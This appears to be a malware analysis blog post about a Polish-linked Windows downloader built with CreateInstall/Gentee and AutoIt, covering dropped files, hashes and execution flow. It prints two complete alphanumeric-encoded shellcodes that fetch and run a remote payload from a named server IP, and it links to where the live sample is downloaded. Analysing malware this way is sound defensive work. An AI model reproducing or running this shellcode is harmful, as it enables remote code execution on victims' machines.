Dropper

inct.com

aqq1.com

Symantec.com

Figure 3: Symantec.com sourcecode

jqs.com

184.82.19.103

Figure 2: Call to shellcode

Figure 3: Alphanumeric encoded shellcode

This will be a quick analysis of a Downloader I recently came across (thanks to Artem for providing the sample!). What makes this malware special is the uncommon programming language which it uses to accomplish its tasks (actually a scripting language). The malware itself is very rudimentary, only the actual Downloader (spawns a shellcode) is a bit more advanced. Unfortunately the server isn't responding to the requests from the Downloader, so it is unclear what final purpose this malware has. I think the scripting languages and the shellcode were chosen to evade AV (heuristic) detections. The detection rates of the Dropper are still very low (6/46), even 2 years after its creation:I haven't uploaded the dropped files, but I guess detections rates are also very low if at all. This task is left to the reader. ;-)- Makes use of Gentee scripting language (actually uses CreateInstall, which was coded in Gentee)- Makes use of AutoIt scripting language - Spawns a shell to download additional component(s)A dynamic analysis of this malware can be found at malwr.com:I try to give some additional information, so let's start with the Dropper.All files of this malware have the extension ".com", but they are all .exe files (just renamed to .com).Sample: sample.exeSize: 785.742 BytesTimestamp: 31.01.2011 17:44:13MD5: DBABCE375DE619916E727D24679C6BD3SHA1: D8C7EF587EAB81C1BBC79AA695F5F7FF319F0484The sample can be downloaded at kernelmode.info: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2445 The Dropper was created with CreateInstall tool ( www.createinstall.com ) and consists of multiple files. CreateInstall itself is written in Gentee programming language, which is actually a scripting language. Gentee programs can be bundled into standalone .exe files and are interpreted at runtime by the Gentee Interpreter (genteert.dll and guig.dll). The Dropper creates the following files and folders in the Windows Temp folder:- ...Temp\genteert.dll- ...Temp\genteeXX.tmp (XX stands for random Hexbytes)- ...Temp\genteeXX\guig.dll- ...Temp\genteeXX\setup_temp.gea- ...Temp\Symantec\aqq1.com- ...Temp\Symantec\faktura_scan535624.jpg- ...Temp\Symantec\inct.comThereafter the file inct.com is executed and the following files are deleted again:- ...Temp\genteeXX\guig.dll- ...Temp\genteeXX\setup_temp.gea- ...Temp\genteeXX.tmp- ...Temp\genteert.dllThis file is a compiled AutoIt script, which by default is packed with UPX. After unpacking it, we can load the executable into an AutoIt decompiler (e.g. www.exe2aut.com ) to see that this file just shows the picture "faktura_scan535624.jpg" (see above) and runs the file "aqq1.com" (see above). The picture shows a polish bill of sale from the product from the website fakturki.pl This file was (also) created with CreateInstall and drops the following files and folders into Windows Temp and Autostart folder:- ...Temp\genteert.dll- ...Temp\genteeXX.tmp- ...Temp\genteeXX\guig.dll- ...Temp\genteeXX\setup_temp.gea- ...Temp\Symantec\jqs.com- ...\Autostart\Symantec.comThen it runs the file "Symantec.com" and deletes the following files and folders:- ...Temp\genteeXX\guig.dll- ...Temp\genteeXX\setup_temp.gea- ...Temp\genteeXX\- ...Temp\genteeXX.tmp- ...Temp\genteert.dllThis is another AutoIt script compiled into a standalone .exe file. It starts the dropped file "jqs.com" with one of the following two parameters (alphanumeric shellcodes, encoded with alpha2 - see http://skypher.com/wiki/index.php/Hacking/Shellcode/Alphanumeric/ALPHA2 ):PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIkLkXmYC0uPWpu0ni8e4qjrbDNkRrTpLKf2dLLKF25DLKBRDh4OX7SzevTqIovQIPNLgLCQCL7r6LGPo18OFm5Qjg8bL0CbRwNkPRfpLKrbElC1jpnkg0qhNeiPt4aZGqXPpPLKPHB8NkBx10faKcYsGLaYLKfTLKwqKf6QyoEaYPnLKqzo4MVaO7p8m0qeJTvc1mIhUkqm4dSEyrChnkrxGTc1HSpfnkVl2klKshwlwqJsLK34NkGqzpmYW44d5tckaKsQ3ipZv19oKP681OPZnkdRhkk6SmaxpnU5SDs0rH3GbI2NRI2trHRlD7dfwwKOhUVQYoF7F7CgqGsZ3064phvZaFpyY7ioyEJKcoQKTqHIRqPQ3Z332qf1CXoK31s05Pv3V0cX0WNioo9VIoJuxk78SivQyBcbu830drY0LDcbv2qB0Qbr60rHXkBu6NGKyo8ULIkv0jdPCk58K0GCePWpNi9p1zWtpPPj7o1FcXt5qVOnk69ozuEaYof7RwpWf7V6bHtmdFuHsKioN5ouYPpugjRkqdVpJK9EZKSyxhLsIoKOkO6O3tPn1DRv5P30e8zPoEORCfyojucZw03XePdP7p5PSXEPS0705PrwPhSh94f3kUkOIEmCV3RsK9IwF7rHC07P5P5PF3aFu8b2LVOyhb9o9EoukpadJmLKC7UQO3lEo0BUxerxiSjH61IoIoio5atxudTn6XVRfNVQGIFNea6PgCs0AAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHK9C0c0c03Pk9IuP18Rpdnkv2dpNkcb6lnkrrR4NkcBthFoMgszDfeaiodqo0LlGLsQsLVbfLwPIQHOvm5Qo7jBhpRrbwnkf2DPlKqR7LvaN0NkG0CHOu9PrTaZ5QHPpPnk1X7hnk1H10C1N3xc7L3ylKgDLKEQN6tq9ouaIPllZaHOfmUQKwVXiprUZTuScMYh7KQmQ40um22xlKBxFD5QYCe6nkvlbkNk2x7lFaJsNkfdlK31jpMYctutfDQKCkU1f9rzsaKOM0v8so2zlKB2ZKlF3mBHRNQurTePCXt7CYBNqyV42HRlcGfFs7kOhU01iov7Rwf7bwRJuPv4QxwJaFqimwyoXUHkRkckuahIpQ0Q1z5Sv12qSX2peP5P5PaCv0PhcgNiOoZfioN5xkdtqI6QhRf2E8WpTBa0nd3b0Rf2pQF2PPe8ZKcedngKiojumY9VPjTP3kUaIoV7CgV7cgaFBHFMs6eHSKioXUNekpSEGjBkSDfp8kM9xk1YM8XGkOkOioDoPNPi5gPnWpGpe88pX5mrPVIoHU2JQPph7pTPwpwp585Pc0cps0QGU8rxOTqCkUYoxUNssc0SmYiwPWbHc010wpC0V3pV58Frz6K9kRIoXUOuiPPtJmLKdGvajcNekpD5herxYSm82EyoYoioTqGHFTdnGH4rDnUagIvNeatpVSePAAIt first checks if the passed days of the current year reached the number 100. If so, jqs.com with the first shellcode is started and then Symantec.com sleeps for a minute. Then a file named "jar_cache879799398409779005999.tmp" is searched in Temp folder and gets deleted if found. I don't know why this "Java file" is searched and deleted, but it is probably the file that gets downloaded or dropped from the downloaded file. Another possibility is that the malware is launched by a Java Applet or a Java exploit. If this Java file isn't found, jqs.com is started with the second shellcode. Then again it sleeps for a minute, searches for the same "Java file" and deletes it.There are two polish words as function names in the script ("" = "launch" and "" = "cleanup"). Together with the picture (see above), I think the malware's creator is from poland or polish speaking.This file was also packed with UPX. This file launches one of the above shellcodes within a new Thread to connect to server at. It does this by allocating a memory buffer (VirtualAlloc()) and storing the passed parameter (shellcode) into it. Then the pointer of the buffer is passed as lpParameter to the CreateThread() API function. The new Thread uses the pointer to call the shellcode (call eax).The shell dynamically resolves some Windows API functions to call them afterwards. It requests data from the server (InternetReadFile()), to copy it into a buffer (VirtualAlloc()) and passing execution to it. As mentioned at the beginning, the server isn't responding, so it's not possible to get more information of the downloaded data (another file or shellcode).Now I need a Re-Neducation :-)